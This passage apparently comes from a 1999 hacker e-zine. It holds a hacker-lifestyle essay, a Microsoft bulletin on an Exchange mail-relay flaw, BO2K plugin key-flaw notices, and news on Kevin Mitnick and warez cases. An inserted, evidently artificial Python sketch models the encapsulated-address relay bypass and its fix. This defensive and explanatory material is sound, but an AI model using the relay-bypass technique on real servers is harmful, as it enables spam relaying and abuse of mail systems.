     they read at all. So if you can't really read...STOP RIGHT HERE. GO
     learn to read first. If you can't read at a minimum 12th Grade level
     you can't be a hacker. Reading is the basic skill you must have to do
     EVERYTHING BEYOND THIS POINT.
     
      Tell your friends you can't party...you're busy. Spend at least 4
     hours a day at your new-found fascination...or decide right here
     and now that you can't cut it! If you CAN, get a copy of MINIX or
     LINUX...start learning about OPERATING SYSTEMS. Then start your
     1st real hack...try building a computer-controlled, DTMF dialer
     card for your cheap PC...write the code to use it with, make it
     a TSR to keep life interesting...now port it to MINIX or whatever
     ...better yet, port it as an IOCTL call at kernel level! You keep
     reading...
     
      Now you're ready to take on something more complex - go to the
     Library, start a literature search; topic: Telephone Technologies.
     RTFM! Learn about the ancient cross-bar, the Pre-ESS systems, the
     fab MFTSS, the TELEX boxes and circuits...keep reading...buy up
     an older, cheap (like under $50) cellular phone...by this time
     you should already have a subscription to "Nuts & Volts" as well
     as a few other grassroots technology pubs....buy a copy of the
     "Cellular Hacker's Bible"....start by doing something simple..
     ..disassemble and re-write the phone's control ROM to allow it
     to function as an 800MHZ scanner...hopefully you've assembled
     a large array of tools and test gear by now. You've got a good
     dual-trace scope, some pc-based PROM burner, a signal generator,
     a logic probe or two, maybe even a microprocessor-emulator for
     the 5051, the Z80, the 68010 or something....you may have been
     dragged into some fields-afar by life - incorporate them: If
     somebody dragged you into SCUBA, build your own sonar. If you
     have gotten interested in amateur radio, you can build a lot
     of swell stuff...I recommend you checkout Packet's AX25A level2
     protocol...very slick stuff! If your buds are all into motors,
     take a whack at doing your own Performance PROMS for GM's F.I. and
     spark advance curves...or try adapting some Volkswagen/BOSCH
     K-Jetronic F.I. to a Harley Davidson!..maybe you're into music
     so you buy a synthesizer and learn all about electronic music,
     you start hacking analog modules and build a nicer synth than you
     could buy! Then you interface it to a MIDI port on a cheap 286AT
     and then hack up some sequencer software, or buy some and then
     disassemble it to fix all the bugs! You keep reading...
     
      By now most of your friends are also "far into the pudding", you
     have either gained 50 lbs or gone totally skinny...your skin tone
     is 2 shades lighter from being indoors so long...most of the opposite
     sex is either totally freaked by or with you - they either dig you,
     or they don't!...you're probably knocking on the door of what will
     be a $60K+/yr job as a systems analyst...and you are well-aware that
     90% of the people in this world can't talk their way out of a badly
     cooked steak at the local eatery, let alone install a new motherboard
     in their PC! So you pick up some extra cash on doing shit like that
     for the straights...you keep reading, and RTFM'ing higher and higher,
     learning about networks...the VCR breaks down and your SO bitches
     about having to wait till monday to have it fixed...you fix it in
     about 40 minutes....the next day the clothes dryer starts to make
     squeaking noises like a 50' mouse, you've never fixed one before -
     but somehow it's not that difficult to open the bastard up and find
     the squeak and fix it...and suddenly it dawns on you that hacking
     code or hardware is pretty much the same! You keep reading...
     
      Congrats, you are now a real hacker. Absolutely nothing but a lack of
     time (or in some cases money) can stop you. You are a true Technologic
     Philosopher...you can function in places a mere Engineer or Scientist
     would truly FEAR TO TREAD! You can read better than Evelyn Wood, you
     have a collection of tools that would make a Master Machinist and a
     Prototype EE or ME cry. You can calculate series and parallel resonant
     circuits in your head. You can fix any consumer appliance - if you can
     get the parts. Your car has either become one of your main hacks or
     you've delegated the job to a mechanic who you have found to be a
     fellow hacker; and you work on his homebrew 68010 unix box...because
     you've got a 68010 emulator and he works on your car because that's
     the kind he specializes in! Maybe you trade services with people
     for 50% of what ordinary people have to BUY WITH CASH!...you keep
     reading...
     
      (this is the stage where the author now finds himself...16 years
       into a career at a Fortune 5 company and age 42...still reading...
       your mileage may vary! <-((that's my code too! I co-wrote VEEP,
       (vehicle-economy-emissions-program, a complete auto-simulator,
       written in Fortran-5 for the Univac 1108 system using punch-cards!)
       for the Ford Foundation and the DOT while at JPL in 1973)) )
     
     
     -Avatar-> (aka: Erik K. Sorgatz) KB6LUY          +----------------------------+
     TTI(es@soldev.tti.com)or: sorgatz@avatar.tti.com *Government produces NOTHING!*
     3100 Ocean Park Blvd. Santa Monica, CA  90405    +----------------------------+
     (OPINIONS EXPRESSED DO NOT REFLECT THE VIEWS OF CITICORP OR ITS MANAGEMENT!)
     
      
     @HWA 
     
     
04.0 Microsoft security bulletin: Encapsulated SMTP address vulnerability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     Microsoft Security Bulletin (MS99-027)
     
     --------------------------------------
     
      
     
     Patch Available for "Encapsulated SMTP Address" Vulnerability
     
     Originally Posted: August 06, 1999
     
     Summary
     
     ======
     
     Microsoft has released a patch that eliminates a security vulnerability in Microsoft Exchange Server. The vulnerability could allow an attacker
     to perform mail relaying via an Exchange server that is configured to act as a gateway for other Exchange sites using the Internet Messaging
     Service.
     
     Frequently asked questions regarding this vulnerability can be
     found at http://www.microsoft.com/security/bulletins/MS99-027faq.asp
     
     Issue
     
     ====
     
     Exchange Server implements features designed to defeat "mail relaying", a practice in which an attacker causes an e-mail server to forward mail
     from the attacker, as though the server were the sender of the mail. However, a vulnerability exists in this feature, and could allow an attacker to
     circumvent the anti-relaying features in an Internet-connected Exchange Server.
     
     The vulnerability lies in the way that site-to-site relaying is performed via SMTP. Encapsulated SMTP addresses could be used to send mail to
     any desired e-mail address. The patch eliminates the vulnerability by making encapsulated SMTP addresses subject to the same anti-relay
     protections as non-encapsulated SMTP addresses.
     
     Affected Software Versions
     
     =========================
     
          Microsoft Exchange Server 5.5
     
      
     
     Patch Availability
     
     =================
     
          ftp://ftp.microsoft.com/bussys/exchange/exchange-public
     
          /fixes/Eng/Exchg5.5/PostSP2/imc-fix
     
     NOTE: Line breaks have been inserted into the above URL for readability.
     
     More Information
     
     ===============
     
     Please see the following references for more information related to this issue.
     
          Microsoft Security Bulletin MS99-027: Frequently Asked Questions,
          http://www.microsoft.com/security/bulletins/MS99-027faq.asp.

          Microsoft Knowledge Base (KB) article Q237927,
          XIMS: Messages Sent to Encapsulated SMTP Address Are Rerouted Even Though Rerouting Is Disabled,
          http://support.microsoft.com/support/kb/articles/q237/9/27.asp.

          Microsoft Security Advisor web site,
          http://www.microsoft.com/security/default.asp.
     
     Obtaining Support on this Issue
     
     ==============================
     
     This is a fully supported patch. Information on contacting Microsoft Technical Support is available at
     http://support.microsoft.com/support/contact/default.asp.
     
     Acknowledgments
     
     ==============
     
     Microsoft acknowledges Laurent Frinking of Quark Deutschland GmbH for bringing this issue to our attention and working with us to alert
     customers about it.
     
     Revisions
     
     ========
     
          August 06, 1999: Bulletin Created.
     
      
     
      
     
     -----------------------------------------------------------------------
     
     THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND.
     MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
     FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
     DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
     DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
     SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
     THE FOREGOING LIMITATION MAY NOT APPLY.
     
     (c) 1999 Microsoft Corporation. All rights reserved.
     
     @HWA     
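
The fix the bulletin describes, putting an encapsulated recipient through the same anti-relay decision as a plain one, can be sketched as below. This is an added example, not Microsoft's code and not part of the bulletin: the IMCEA<type>-<encoded>@<domain> encapsulation syntax (+XX hex escapes, _ for /) is assumed from Exchange documentation rather than from this page, and the domains, IP addresses and function names are constructed for illustration.

```python
import re

# Assumed encapsulation syntax (not stated in the bulletin):
#   IMCEA<TYPE>-<encoded address>@<gateway domain>
# "+XX" is a hex-escaped character and "_" stands for "/".
IMCEA_RE = re.compile(r"^IMCEA([A-Za-z0-9]+)-(.+)$", re.IGNORECASE)
ESCAPE_RE = re.compile(r"\+([0-9A-Fa-f]{2})|_")

LOCAL_DOMAINS = {"corp.example"}   # constructed: domains this gateway delivers for
TRUSTED_CLIENTS = {"10.0.0.5"}     # constructed: hosts permitted to relay


def decode_imcea(local_part):
    """Return (address_type, decoded_address), or None if not encapsulated."""
    m = IMCEA_RE.match(local_part)
    if m is None:
        return None

    def unescape(tok):
        # Single pass, so a decoded "+" or "_" is never decoded a second time.
        return "/" if tok.group(0) == "_" else chr(int(tok.group(1), 16))

    return m.group(1).upper(), ESCAPE_RE.sub(unescape, m.group(2))


def effective_recipient(rcpt, max_depth=4):
    """Unwrap encapsulated SMTP recipients until a plain address remains."""
    for _depth in range(max_depth):
        local, sep, _domain = rcpt.rpartition("@")
        inner = decode_imcea(local) if sep else None
        if inner is None or inner[0] != "SMTP":
            # Plain address, or a non-SMTP type that stays with the local site.
            return rcpt
        rcpt = inner[1]
    raise ValueError("recipient encapsulated too deeply")


def domain_of(addr):
    """Lower-cased domain part, or an empty string when there is none."""
    _local, sep, domain = addr.rpartition("@")
    return domain.lower() if sep else ""


def relay_allowed_naive(client_ip, rcpt):
    """Model of the gap: only the outer domain of the recipient is inspected."""
    return client_ip in TRUSTED_CLIENTS or domain_of(rcpt) in LOCAL_DOMAINS


def relay_allowed(client_ip, rcpt):
    """Same policy, applied to the address the message would really go to."""
    if client_ip in TRUSTED_CLIENTS:
        return True
    try:
        target = effective_recipient(rcpt)
    except ValueError:
        return False               # refuse anything that cannot be normalised
    return domain_of(target) in LOCAL_DOMAINS


# Constructed sample recipients, all offered by an untrusted client.
SAMPLES = [
    "alice@corp.example",
    "bob@elsewhere.example",
    "IMCEASMTP-alice+40corp+2Eexample@corp.example",
    "IMCEASMTP-bob+40elsewhere+2Eexample@corp.example",
]


def compare_policies(client_ip="203.0.113.9"):
    """Return (recipient, naive_decision, normalised_decision) per sample."""
    return [(r, relay_allowed_naive(client_ip, r), relay_allowed(client_ip, r))
            for r in SAMPLES]


if __name__ == "__main__":
    for rcpt, naive, fixed in compare_policies():
        flag = "  <-- decisions differ" if naive != fixed else ""
        print(f"{rcpt:55} naive={naive!s:5} normalised={fixed!s:5}{flag}")
```

A recipient on which the two decisions differ is one whose outer domain is local while its decoded destination is not, which is also a useful pattern to search for in SMTP logs.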
     
     
05.0 Disrupting Net Access a Cybercrime? 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by D----Y
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Disrupting Net access a cybercrime?
     By Robert Lemos, ZDNN
     August 6, 1999 3:28 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
     
     A former system administrator of the University of Oklahoma has been charged under the state's
     computer-crime statutes with slowing the university's network to a crawl.
     
     Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when
     hordes of incoming students downloaded pirated software from servers that he had allegedly set
     up on the university's network. 
     
     "There were times when the authorized users -- students -- were not able to access the Internet at
     all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District
     Attorney's Office.
     
     Known as warez (pronounced "wares"), the software is identical to store-bought versions and
     includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the
     network, and many students were denied access.
     
     Getting up to speed
     While distributing such software is illegal, the district attorney's office has only charged Breding
     with interfering with network operation. On that charge alone, the former employee faces up to 10
     years in the state penitentiary and up to $100,000 in fines.
     
     The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without
     authorization disrupt or cause the disruption of computer services or deny or cause the denial of
     access or other computer services to an authorized user of a computer, computer system or
     computer network."
     
     An initial lack of familiarity with computer crimes stymied the investigation. State investigators and
     prosecutors needed to learn how to pursue digital criminals and examine the evidence. 
     
     "These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look
     into it." 
     
     Palk stressed that, for the investigators, the case was a necessary learning experience. "This may
     be a hallmark of things to come," he said. "And we need to be ready."
     
     University officials would not comment for this story. A preliminary hearing is set to start on Aug.
     17. 

     @HWA
     
06.0 IDEA CAST BO2K PLUGIN VULNERABILITY
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From http://www.securityfocus.com/
      
     BO_CAST Plug-in Identical Key Vulnerability
     Bugtraq ID: 561
     Remote: Yes
     Date Published: 08/04/99
     Relevant URL:
     http://www.securityfocus.com/level2/?go=vulnerabilities&id=561
     Summary:
     
     
     The BO_CAST plugin for BO2k has a vulnerability that causes any password
     to generate the same CAST-256 key. Daniel Roethlisberger has released an
     updated version, BO_CAST 2.3 .  It is available for download at:
     
     
     http://www.roe.ch/download/bo_cast.shtml
     
     
     IDEA BO2k Plug-in Identical Key Vulnerability
     Bugtraq ID: 562
     Remote: Yes
     Date Published: 08/04/99
     Relevant URL:
     http://www.securityfocus.com/level2/?go=vulnerabilities&id=562
     Summary:
     
     
     The IDEA encryption plug-in for BO2k version 0.3 has a flaw which causes
     any password to generate the same key. Maw~ has released version 0.4 which
     does not have this vulnerability. It is available at:
     
     
     http://www.wynne.demon.co.uk/maw/
     
     @HWA
     
07.0 Mitnick gets a welcome birthday present from the LA DA
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From Http://www.hackernews.com 

     Mitnick Gets Birthday Present from LA DA - Federal Sentencing Set For Today 


      contributed by evenprime and turtlex 
      The Los Angeles District Attorney has given Kevin a
      surprise but welcome birthday present by dropping the
      state charges against him. Last Friday, Kevin's fifth
      birthday behind bars, the LA DA claimed that the
      six-year old case had been mischarged. Kevin had been
      charged with one count of illegally accessing a
      Department of Motor Vehicles computer and retrieving
      confidential information. (Which means he (or someone
      else) tricked a DMV employee over the phone into
      faxing him information) This action clears the way for
      Kevin to be released to a halfway house after his federal
      sentencing. 

      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html
      
      News.com
      http://www.news.com/News/Item/0,4,40234,00.html?tt.abc..ticker.ne
      
      MSNBC
      http://www.msnbc.com/news/298088.asp
      
      Yahoo News 
      http://dailynews.yahoo.com/h/zd/19990806/tc/19990806375.html

      Federal Sentencing Hearing Set For Today
      Once again Kevin Mitnick is scheduled to be sentenced
      for his federal charges. While he has already pleaded
      guilty and has accepted time served plus probation as
      punishment the issue of restitution still needs to be
      decided. The hearing will be held today (Monday) at
      1:30 pm in Courtroom 12 at the LA Federal Courthouse,
      312 N. Spring Street. 

      FREE KEVIN            
      http://www.freekevin.com/
      
     ZDNET;
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     L.A. district attorney drops Mitnick case
     By Paul Elias, ZDNN
     August 6, 1999 6:09 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html?chkpt=hpqs014
     
     The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its
     six-year-old computer hacking case against the convicted hacker. 
     
     That development could speed the release of the 35-year-old, removing an obstacle that could
     have prevented Mitnick from going free from federal prison soon after he is formally sentenced
     Monday in an unrelated federal case. 
     
     "We're ecstatic," said Carolyn Hagin, one of Mitnick's attorneys in the state case. 
     
     Deputy District Attorney Daniel Bershin said he dropped the state case because it had been
     "mischarged." 
     
     Dubious 'computer' crime
     In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department
     of Motor Vehicles computer and retrieving confidential information. The problem with that charge
     is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24,
     1992, and duped an employee accessing the DMV computer for him. 
     
     "Since Mitnick did not personally connect to the DMV computer, but either he or someone else
     communicated with the DMV technician via a telephone conversation," Bershin wrote in his
     motion to dismiss the case, "it would be difficult to prove that Mitnick gained entry to the DMV
     computer, or that he instructed or communicated with the logical, arithmetical or memory function
     resources of the DMV computer." 
     
     Bershin also confirmed at a July 28 hearing what many of Mitnick's supporters have been claiming
     for years: that their martyr has been the target of overzealous prosecution. 
     
     Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district
     attorney's intention to drop the case at the July 28 hearing, a position that caught Harris off guard. 
     
     As early as July 7, Deputy District Attorney Larry Diamond -- who had originally handled
     Mitnick's case -- was vigorously arguing against any reduction in Mitnick's $1 million bail pending
     trial. 
     
     Judge 'curious'
     "So I'm curious as to why all of a sudden between July 7 and July 28 we have this radical change
     in position," the judge asked of Bershin. 
     
     "Well, I think to be quite candid, the answer, of course, is Mr. Diamond," Bershin said. "I know
     that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that
     Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long
     time and has a great interest in him." 
     
     At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be "a radical
     jump off the precipice to move to dismiss at this time." He ordered Bershin to submit a written
     motion to dismiss, which Harris granted Friday. 
     
     Halfway house an option
     Harris' action clears the way for Mitnick's freedom. He is due to be sentenced in federal court for
     several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald
     Randolph of L.A.'s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer
     to order Mitnick into a halfway house after formally sentencing him to 68 months in prison. 
     
     Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn't Mitnick is set to go
     free sometime in January. 
     
     Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several
     high-tech giants such as Sun Microsystems (Nasdaq:SUNW) and Motorola Corp.
     (NYSE:MOT), say that Mitnick's hacking cost them millions of dollars in compromised intellectual
     property. 
     
     Federal prosecutors are seeking $1.5 million in restitution. Mitnick, through Randolph, argues that
     he is leaving prison broke and that conditions of his probation, once he is released, severely
     restrict his access to a computer, the only way he knows how to make a living. 
     
     Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled
     to decide Monday as well. 
     
     Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him.  
            
     -=-
     
     News.com
     
     District attorney drops Mitnick case 
     By Dan Goodin
     Staff Writer, CNET News.com
     August 6, 1999, 7:35 p.m. PT 

     The Los Angeles district attorney's office has dropped state charges against Kevin Mitnick, the notorious hacker who
     pleaded guilty in March to wire fraud and other federal charges, according to a published report.

     Mitnick, who will receive a five-year sentence if a federal judge accepts the plea, could be released from jail early next year. He
     has been held in federal custody since he was captured in a high-profile investigation in 1995. He also faced separate state
     charges as well.

     But Deputy District Attorney Daniel Bershin said today he was dropping those charges, because they had been "mischarged," ZD
     Network News is reporting. The case stemmed from 1993 charges that Mitnick unlawfully accessed computers at the state
     department of motor vehicles.

     Bershin admitted in a brief filed today that the case was flawed because Mitnick never accessed the computer himself, but
     allegedly posed as a welfare fraud inspector over the phone in order to get a DMV to retrieve information, ZDNN said.

     Mitnick is scheduled to appear in federal court in Los Angeles this Monday for sentencing before U.S. District Judge Mariana
     Pfaelzer.
     
     -=-
     

     Kevin Mitnick appears at a hearing shortly after his
     arrest on Feb. 15, 1995, in Raleigh, N.C.
     L.A. drops Mitnick case
     Action could pave way for hacker's freedom
     By Paul Elias, ZDNN





     AUG. 3 --  The Los Angeles district attorney gave
     Kevin Mitnick a birthday present Friday,
     dropping its six-year-old computer hacking case
     against the convicted hacker. That development
     could speed the release of the 35-year-old
     hacker, removing an obstacle that could have
     prevented Mitnick from going free from federal
     prison soon after he is formally sentenced
     Monday in an unrelated federal case.

            "WE'RE ECSTATIC" said Carolyn Hagin, one of
     Mitnick's attorneys in the state case.
            Deputy District Attorney Daniel Bershin said he
     dropped the state case because it had been "mischarged."
            In 1993, the district attorney charged Mitnick with one
     count of illegally accessing a Department of Motor Vehicles
     computer and retrieving confidential information. The
     problem with that charge is that Mitnick, posing as a
     Welfare Fraud investigator, simply picked up a telephone
     on Dec. 24, 1992, and duped an employee accessing the
     DMV computer for him.
            "Since Mitnick did not personally connect to the DMV
     computer, but either he or someone else communicated with
     the DMV technician via a telephone conversation," Bershin
     wrote in his motion to dismiss the case, "it would be difficult
     to prove that Mitnick gained entry to the DMV computer,
     or that he instructed or communicated with the logical,
     arithmetical or memory function resources of the DMV
     computer."
            



            Bershin also confirmed at a July 28 hearing what many
     of Mitnick's supporters have been claiming for years: that
     their martyr has been the target of overzealous prosecution. 
            Bershin first informed Los Angeles County Superior
     Court Judge Leland Harris of the district attorney's intention
     to drop the case at the July 28 hearing, a position that
     caught Harris off guard. 
            
     RADICAL CHANGE IN POSITION
            As early as July 7, Deputy District Attorney Larry
     Diamond -- who had originally handled Mitnick's case --
     was vigorously arguing against any reduction in Mitnick's $1
     million bail pending trial. 
            "So I'm curious as to why all of a sudden between July
     7 and July 28 we have this radical change in position," the
     judge asked of Bershin. 
            "Well, I think to be quite candid, the answer is, of
     course, Mr. Diamond," Bershin said. "I know that Mr.
     Diamond has wanted to handle this matter personally for a
     long time ... and I know that Mr. Diamond personally
     believes that Mr. Mitnick has been skating through the
     system for a long time and has a great interest in him." 
            At that July 28 hearing, Harris refused to dismiss the
     case, saying to do so would be "a radical jump off the
     precipice to move to dismiss at this time." He ordered
     Bershin to submit a written motion to dismiss, which Harris
     granted Friday. 
            
     MITNICK'S FREEDOM?
            Harris' action clears the way for Mitnick's freedom.
     He is due to be sentenced in federal court for several
     hacking charges he pleaded guilty to in March. His attorney
     in the federal case, Donald Randolph of L.A.'s Randolph &
     Levanas, said he will ask Central District Judge Mariana
     Pfaelzer to order Mitnick into a halfway house after formally
     sentencing him to 68 months in prison. 
            Randolph said he is optimistic Pfaelzer will grant the
     request, but if she doesn't Mitnick is set to go free
     sometime in January. 
            Still at issue is the amount of money Mitnick must repay
     in restitution. His victims, including several high-tech giants
     such as Sun Microsystems and Motorola Corp. say that
     Mitnick's hacking cost them millions of dollars in
     compromised intellectual property. 
            Federal prosecutors are seeking $1.5 million in
     restitution. Mitnick, through Randolph, argues that he is
     leaving prison broke and that conditions of his probation,
     once he is released, severely restrict his access to a
     computer, the only way he knows how to make a living. 
            Pfaelzer has indicated that she will order Mitnick to
     make some restitution, which she is scheduled to decide
     Monday as well. 
            Mitnick was arrested in 1995 after a high-profile,
     two-year, electronic manhunt for him. 
            

     (c) 1999 ZDNet. All rights reserved. Reproduction in
     whole or in part in any form or medium without express
     written permission of ZDNet is prohibited
      
     @HWA 
     
08.0 An Accurate Look At Mitnick's Life Behind Bars 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

     From HNN http://www.hackernews.com/
     
      contributed by staff 
      There have been a few articles floating around the web
      that attempt to describe what Kevin is going through
      and the experiences he must endure. This one appears
      to be the most accurate and is based off only the third
      Mitnick interview granted to a media organization. 

      Aviary Mag     
      http://aviary-mag.com/News/Mitnick_Life/mitnick_life.html
      
      


      Kevin Mitnick's Life -- Life in and around 6 South, 626

      

                                              ATTRITION Staff

     Recently, two of the Attrition Staff writing for OSAll caught up with
     Kevin Mitnick and asked a few more questions about his living
     conditions. We presented him with an article by Kimberly Tracey (-1-)
     to establish a baseline for our talk and a reason for this followup.

     Life as it REALLY stands 

     Here's a little bit about Kevin Mitnick's life at the Los Angeles Metro
     Detention Center (MDC), a bit more up to date: 

     At the MDC there IS a yard for exercising. It is called the "rec deck"
     (Recreation Deck), rather than a yard and offers fresh air and sunlight,
     through a protected metal grating. On this patio Kevin has the option of
     playing basketball, walking or using the universal weights. 

     The call for "lockup"(-1-) (known as 'lockdown' in most prisons
     including MDC) means that inmates must return to their cells. This is
     typically done for a count to ensure all inmates are still within the confines
     of the prison, or if any of the individuals get out of control. The times
     when they are all rounded up on the balcony means they are 'tossing
     cells' or doing a 'shakedown' (looking for contraband items). 

     There are two 'units' per floor. Each unit has three TV's giving a total of
     six per floor. However, inmates from one unit may not use the resources
     from (or visit) another unit. Short of personal or legal visits (or court
     appearances), they do not leave their unit. 

     As of May 24th, the vending machines were removed from the floors.
     Despite this, the microwaves (2 per unit) are still available. Along with
     the removal of vending, many items were added to the commissary. 

          "I never buy food from the guards. No inmates including me
          purchase food or any items from MDC staff. It's strictly
          forbidden," Kevin says. 

     The only source for Kevin to buy food is the commissary which offers a
     small variety of food (as well as toiletry items). 

     We learned that the MDC does offer a couple exercise bikes that still
     work. "I use them all the time," Kevin smiles. 

     While using one of the four phones in his unit, he often brings a stool
     from his cell to make the calls a bit more comfortable. Often times, the
     phones are turned on as early as 6am he says. The practice of 'buying'
     phone time is frowned upon by MDC staff. 

          "The MDC does not allow inmates to have any cash or change,
          money is contraband so it's impossible to buy phone time for a
          'few extra dollars,'" Kevin reports. 

     Since February, Kevin has been able to use the government approved
     laptop on weekdays, with appropriate supervision. This time is usually
     spent sorting through the many gigs of evidence in preparation for his
     case. Now that a plea has been entered, time is spent making a much
     more educated guess at the actual damage figures being leveled at him. 

     Unfortunately, the friendly advice about tapes and videos that was
     offered by Ms. Tracey is a bit inaccurate. 

          "I appreciate any tapes or CD's, however, I'll have to wait until
          I'm released before I can listen to them." 

     Kevin has no resource to play tapes or videos with or without his
     defense team present. 

     No Place Like Home 

     Each day that Kevin comes down to the visiting room, he carries a
     cardboard box overflowing with legal declarations, printed evidence,
     news articles and more. Ten minutes later, one of the MDC staff bring
     him the government approved laptop so that he can examine the bulk of
     the evidence. Outfitted with a locking device preventing floppy use,
     Kevin can only receive programs and evidence via CDROM. Dual
     booting into Redhat Linux and Windows 95, he is able to access almost all
     of the evidence. To be more accurate, he can not access any of the
     evidence from the VMS backup tapes, megs of logs from various CDs,
     and of course the evidence still not provided by the government. 

     After visiting his direct family or legal staff, Kevin returns to what he has
     been forced to call 'home' for four years, five months, and twenty one
     days. Not that he or anyone else is counting. Home is a cell smaller than
     the largest of private visitation rooms reserved for legal visits. Those
     rooms are perhaps 8x10, and yet still larger than Kevin's cell (that he
     shares with one other inmate). Cell #626 sits off the 'common area' and
     is separated by a wooden door with a narrow glass window, offering
     less view than the narrow window that grants him a peek of the Roybal
     Federal Building. Along with the other inmate, the tiny cell has two
     bunks, a toilet, sink, all acceptable personal possessions and a tendency
     to give people a cramped feeling. 

     The common area is available to inmates from roughly 6:30 to 9:45. This
     area contains the bikes, microwaves, televisions and phones. Also
     provided are billiards and ping pong tables. While the common area may
     sound fun and recreational, it is not conducive to those trying to read or
     study legal briefs. 

     Kevin's cell has a lovely view of the sixth floor of the Roybal Federal
     Building. A building with more stringent metal detectors than the MDC
     even. Even from the sixth floor, he gets to view more federal offices. 

     A Day in the Life of.. 

     With a better image of the material life surrounding Kevin, hopefully it
     will be easier to envision a typical day.

          6:30 - wake up; sign up for phone time (typically two 20 minute
          blocks) 
          7:00 - light breakfast (example: pastry and milk) 
          7:45 - head to patio, walk for half an hour 
          8:15 - weight lifting on patio 
          10:20 - use part of phone time 
          10:40 - grab lunch tray (example: eggs, burrito, potatoes, milk);
          lockdown for lunch 
          12:00 - "boring time": legal visits, phone calls, lay out in sun, read,
          socialize 
          3:45 - lockdown for count 
          4:45 - grab dinner tray for later; use part of phone time 
          6:00 - ride bike, exercise 
          7:30 - shower; eat dinner 
          9:45 - lockdown; shave, read 
          11:00 - sleep 

     During most of his workouts, Kevin is able to listen to an AM/FM
     walkman. For those of you interested in his music selection, his radio is
     programmed with the following stations: 

          #1 93.1 
          #2 95.5 (KEZY) 
          #3 103.1 
          #4 106.7 (KROQ) 
          #5 98.7 (STAR) 

     Drop Him A Line 

     The letters and comments he receives are an uplift to say the least.
     Continued support and cards are welcome and he sends his thanks to
     the many people who have written him. Kevin enjoyed his birthday on
     August 6th, especially when the State of California opted to drop the
     outstanding charges leveled at him some seven years prior. Despite his
     birthday passing, cards or words of encouragement would be a great
     gift. Federal judge M. Pfaelzer sentencing him to the defense proposed
     restitution and 'time served' would be the best gift though. ;) If that is too
     much to ask, recommending his immediate release to a half way house
     would be acceptable. 

     As Ms. Tracey said, sending him money via postal money orders is
     appreciated so that he can enjoy it right away. Another way to support
     Kevin is to purchase 'Free Kevin' bumper stickers from
     www.freekevin.com as the profit goes toward his legal defense fund. For
     those not keeping up, Kevin is due to be sentenced on Monday, August
     9th at 1:30pm. Judge Pfaelzer can be found at the US Court House
     (-2-), room 12. 

                           Kevin Mitnick 
                            89950-012 
                           P.O. Box 1500 
                       Los Angeles, CA 90053 

     Both of us have spent long hours locked in a government SCIF on
     previous security contracts. We were paid to be in these small
     depressing rooms and hack military networks. I could barely stand 8
     hours in those 10x10 rooms full of computers with no windows. Now,
     Kevin gets to sit in his less than 10x10 cell for allegedly hacking other
     networks. It's sick and ironic. 


     @HWA
     
09.0 Sony and EA Take Down Paradigm 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/
     

      contributed by km 
      Sony Computer Entertainment America and Electronic
      Arts have recently filed suit against alleged members of
      the warez group Paradigm in the U.S. District Court for
      the Northern District of California. The suit alleges that
      members of the group infringed on the copyrights and
      trademarks by distributing unauthorized copies of
      software from the two companies. United States
      Marshals recently conducted a court-sanctioned seizure
      and impounded evidence at the location of a participant
      of the group. SCEA and EA plan to continue the civil
      case against the pirates, they will also cooperate with
      law enforcement in the United States and will be turning
      over evidence to authorities in several other countries
      for possible criminal action against other group
      members. 

      Yahoo Biz News     
      http://biz.yahoo.com/bw/990806/ca_sony_co_1.html
      
      Friday August 6, 8:05 am Eastern Time

      Company Press Release
      
      Electronic Arts and Sony Computer Entertainment America Nab Internet
      Pirate Ring
      
      Companies file joint lawsuit against online pirates
      
      REDWOOD CITY, Calif. and FOSTER CITY, Calif.--(BUSINESS WIRE)-- August 6, 1999--Declaring war on a major Internet pirate ring that illegally
